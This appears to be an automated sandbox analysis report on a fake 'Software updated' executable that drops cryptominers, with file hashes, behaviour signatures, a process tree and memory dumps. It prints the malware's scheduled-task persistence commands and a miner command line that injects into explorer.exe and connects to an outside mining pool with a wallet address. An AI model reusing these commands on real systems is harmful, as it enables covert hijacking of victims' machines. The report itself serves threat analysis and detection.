Analysis
-
max time kernel
134s -
max time network
125s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
18-07-2021 23:59
Static task
static1
Behavioral task
behavioral1
Sample
Software updated v2.6.0.exe
Resource
win7v20210408
General
-
Target
Software updated v2.6.0.exe
-
Size
256KB
-
MD5
18d05e20731583a22b495d0d1f107c5b
-
SHA1
2ced0e3577063ca3613b43661e7df5bc1411ab09
-
SHA256
b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae
-
SHA512
36e73454b0d74088fb39dbec77c45c4106908dc80efc6a0ac8247a538345b4224f3f5e0cf6b39cf8c1687ddcee58ac2e6f24b735c9b9e277c7d064fd82e7a65a
Malware Config
Signatures
-
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2972-166-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral2/memory/2972-167-0x00000001402EB66C-mapping.dmp xmrig behavioral2/memory/2972-169-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Executes dropped EXE 6 IoCs
Processes:
xmrmine.exeetcmin.exeserverpatch.exertksmbs.exesihost64.exesihost32.exepid process 1968 xmrmine.exe 1892 etcmin.exe 2912 serverpatch.exe 516 rtksmbs.exe 2172 sihost64.exe 2816 sihost32.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
serverpatch.exedescription pid process target process PID 2912 set thread context of 2972 2912 serverpatch.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2800 schtasks.exe 2756 schtasks.exe 3852 schtasks.exe 2216 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
xmrmine.exeetcmin.exeserverpatch.exertksmbs.exepid process 1968 xmrmine.exe 1892 etcmin.exe 2912 serverpatch.exe 516 rtksmbs.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
xmrmine.exeetcmin.exeserverpatch.exertksmbs.exeexplorer.exedescription pid process Token: SeDebugPrivilege 1968 xmrmine.exe Token: SeDebugPrivilege 1892 etcmin.exe Token: SeDebugPrivilege 2912 serverpatch.exe Token: SeDebugPrivilege 516 rtksmbs.exe Token: SeLockMemoryPrivilege 2972 explorer.exe Token: SeLockMemoryPrivilege 2972 explorer.exe -
Suspicious use of WriteProcessMemory 43 IoCs
Processes:
Software updated v2.6.0.exeetcmin.exexmrmine.execmd.execmd.exertksmbs.exeserverpatch.execmd.execmd.exedescription pid process target process PID 3956 wrote to memory of 1968 3956 Software updated v2.6.0.exe xmrmine.exe PID 3956 wrote to memory of 1968 3956 Software updated v2.6.0.exe xmrmine.exe PID 3956 wrote to memory of 1892 3956 Software updated v2.6.0.exe etcmin.exe PID 3956 wrote to memory of 1892 3956 Software updated v2.6.0.exe etcmin.exe PID 1892 wrote to memory of 2576 1892 etcmin.exe cmd.exe PID 1892 wrote to memory of 2576 1892 etcmin.exe cmd.exe PID 1968 wrote to memory of 1744 1968 xmrmine.exe cmd.exe PID 1968 wrote to memory of 1744 1968 xmrmine.exe cmd.exe PID 1744 wrote to memory of 2756 1744 cmd.exe schtasks.exe PID 1744 wrote to memory of 2756 1744 cmd.exe schtasks.exe PID 2576 wrote to memory of 2800 2576 cmd.exe schtasks.exe PID 2576 wrote to memory of 2800 2576 cmd.exe schtasks.exe PID 1968 wrote to memory of 2912 1968 xmrmine.exe serverpatch.exe PID 1968 wrote to memory of 2912 1968 xmrmine.exe serverpatch.exe PID 1892 wrote to memory of 516 1892 etcmin.exe rtksmbs.exe PID 1892 wrote to memory of 516 1892 etcmin.exe rtksmbs.exe PID 516 wrote to memory of 1532 516 rtksmbs.exe cmd.exe PID 516 wrote to memory of 1532 516 rtksmbs.exe cmd.exe PID 2912 wrote to memory of 2256 2912 serverpatch.exe cmd.exe PID 2912 wrote to memory of 2256 2912 serverpatch.exe cmd.exe PID 2912 wrote to memory of 2172 2912 serverpatch.exe sihost64.exe PID 2912 wrote to memory of 2172 2912 serverpatch.exe sihost64.exe PID 516 wrote to memory of 2816 516 rtksmbs.exe sihost32.exe PID 516 wrote to memory of 2816 516 rtksmbs.exe sihost32.exe PID 2256 wrote to memory of 3852 2256 cmd.exe schtasks.exe PID 2256 wrote to memory of 3852 2256 cmd.exe schtasks.exe PID 1532 wrote to memory of 2216 1532 cmd.exe schtasks.exe PID 1532 wrote to memory of 2216 1532 cmd.exe schtasks.exe PID 2912 wrote to memory of 2972 2912 serverpatch.exe explorer.exe PID 2912 wrote to memory of 2972 2912 serverpatch.exe explorer.exe PID 2912 wrote to memory of 2972 2912 serverpatch.exe explorer.exe PID 2912 wrote to memory of 2972 2912 serverpatch.exe explorer.exe PID 2912 wrote to memory of 2972 2912 serverpatch.exe explorer.exe PID 2912 wrote to memory of 2972 2912 serverpatch.exe explorer.exe PID 2912 wrote to memory of 2972 2912 serverpatch.exe explorer.exe PID 2912 wrote to memory of 2972 2912 serverpatch.exe explorer.exe PID 2912 wrote to memory of 2972 2912 serverpatch.exe explorer.exe PID 2912 wrote to memory of 2972 2912 serverpatch.exe explorer.exe PID 2912 wrote to memory of 2972 2912 serverpatch.exe explorer.exe PID 2912 wrote to memory of 2972 2912 serverpatch.exe explorer.exe PID 2912 wrote to memory of 2972 2912 serverpatch.exe explorer.exe PID 2912 wrote to memory of 2972 2912 serverpatch.exe explorer.exe PID 2912 wrote to memory of 2972 2912 serverpatch.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe"C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\xmrmine.exeC:\Users\Admin\AppData\Roaming\xmrmine.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\appdata\roaming\serverpatch.exe"C:\Users\Admin\appdata\roaming\serverpatch.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"4⤵
- Executes dropped EXE
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\etcmin.exeC:\Users\Admin\AppData\Roaming\etcmin.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\appdata\roaming\rtksmbs.exe"C:\Users\Admin\appdata\roaming\rtksmbs.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"4⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exeMD5
f20a5085dbb85927b25ed46a45fe0a13
SHA141b351e45a7be1d6c6c6918ee65b00f5d69ff787
SHA256370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235
SHA5124cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f
-
C:\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exeMD5
e149663730c0b03c8936baffe9645bb4
SHA1c0fb146c35d48481df4149027953e4ab7be59e95
SHA25633225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469
SHA512553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe
-
C:\Users\Admin\AppData\Roaming\etcmin.exeMD5
406f2550d0d4b9b3e2f47994076e8b8b
SHA101ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA2564805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA51273b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
C:\Users\Admin\AppData\Roaming\etcmin.exeMD5
406f2550d0d4b9b3e2f47994076e8b8b
SHA101ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA2564805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA51273b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
C:\Users\Admin\AppData\Roaming\rtksmbs.exeMD5
406f2550d0d4b9b3e2f47994076e8b8b
SHA101ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA2564805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA51273b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
C:\Users\Admin\AppData\Roaming\serverpatch.exeMD5
973037113a1f50e0ca79d3cc42a5ef66
SHA178235c164ebfa47d613a100abf5c64bed10c1036
SHA256a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
C:\Users\Admin\AppData\Roaming\xmrmine.exeMD5
973037113a1f50e0ca79d3cc42a5ef66
SHA178235c164ebfa47d613a100abf5c64bed10c1036
SHA256a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
C:\Users\Admin\AppData\Roaming\xmrmine.exeMD5
973037113a1f50e0ca79d3cc42a5ef66
SHA178235c164ebfa47d613a100abf5c64bed10c1036
SHA256a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exeMD5
f20a5085dbb85927b25ed46a45fe0a13
SHA141b351e45a7be1d6c6c6918ee65b00f5d69ff787
SHA256370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235
SHA5124cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f
-
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exeMD5
e149663730c0b03c8936baffe9645bb4
SHA1c0fb146c35d48481df4149027953e4ab7be59e95
SHA25633225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469
SHA512553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe
-
C:\Users\Admin\appdata\roaming\rtksmbs.exeMD5
406f2550d0d4b9b3e2f47994076e8b8b
SHA101ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA2564805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA51273b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
C:\Users\Admin\appdata\roaming\serverpatch.exeMD5
973037113a1f50e0ca79d3cc42a5ef66
SHA178235c164ebfa47d613a100abf5c64bed10c1036
SHA256a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
memory/516-149-0x0000000002A50000-0x0000000002A52000-memory.dmpFilesize
8KB
-
memory/516-137-0x0000000000000000-mapping.dmp
-
memory/1532-150-0x0000000000000000-mapping.dmp
-
memory/1744-129-0x0000000000000000-mapping.dmp
-
memory/1892-126-0x0000000001350000-0x0000000001351000-memory.dmpFilesize
4KB
-
memory/1892-133-0x000000001D050000-0x000000001D052000-memory.dmpFilesize
8KB
-
memory/1892-122-0x0000000000A90000-0x0000000000A91000-memory.dmpFilesize
4KB
-
memory/1892-117-0x0000000000000000-mapping.dmp
-
memory/1892-125-0x0000000001320000-0x0000000001326000-memory.dmpFilesize
24KB
-
memory/1968-124-0x0000000000850000-0x0000000000859000-memory.dmpFilesize
36KB
-
memory/1968-114-0x0000000000000000-mapping.dmp
-
memory/1968-132-0x0000000000840000-0x0000000000842000-memory.dmpFilesize
8KB
-
memory/1968-118-0x0000000000020000-0x0000000000021000-memory.dmpFilesize
4KB
-
memory/2172-152-0x0000000000000000-mapping.dmp
-
memory/2172-158-0x0000000000510000-0x0000000000511000-memory.dmpFilesize
4KB
-
memory/2172-164-0x000000001C310000-0x000000001C312000-memory.dmpFilesize
8KB
-
memory/2216-163-0x0000000000000000-mapping.dmp
-
memory/2256-151-0x0000000000000000-mapping.dmp
-
memory/2576-128-0x0000000000000000-mapping.dmp
-
memory/2756-130-0x0000000000000000-mapping.dmp
-
memory/2800-131-0x0000000000000000-mapping.dmp
-
memory/2816-153-0x0000000000000000-mapping.dmp
-
memory/2816-165-0x0000000003700000-0x0000000003702000-memory.dmpFilesize
8KB
-
memory/2816-159-0x0000000000E80000-0x0000000000E81000-memory.dmpFilesize
4KB
-
memory/2912-134-0x0000000000000000-mapping.dmp
-
memory/2912-148-0x000000001CC50000-0x000000001CC52000-memory.dmpFilesize
8KB
-
memory/2972-166-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/2972-167-0x00000001402EB66C-mapping.dmp
-
memory/2972-168-0x0000000000C00000-0x0000000000C20000-memory.dmpFilesize
128KB
-
memory/2972-169-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/2972-172-0x0000000002770000-0x0000000002790000-memory.dmpFilesize
128KB
-
memory/2972-173-0x0000000002790000-0x00000000027B0000-memory.dmpFilesize
128KB
-
memory/2972-174-0x0000000002790000-0x00000000027B0000-memory.dmpFilesize
128KB
-
memory/2972-175-0x00000000143B0000-0x00000000143D0000-memory.dmpFilesize
128KB
-
memory/3852-162-0x0000000000000000-mapping.dmp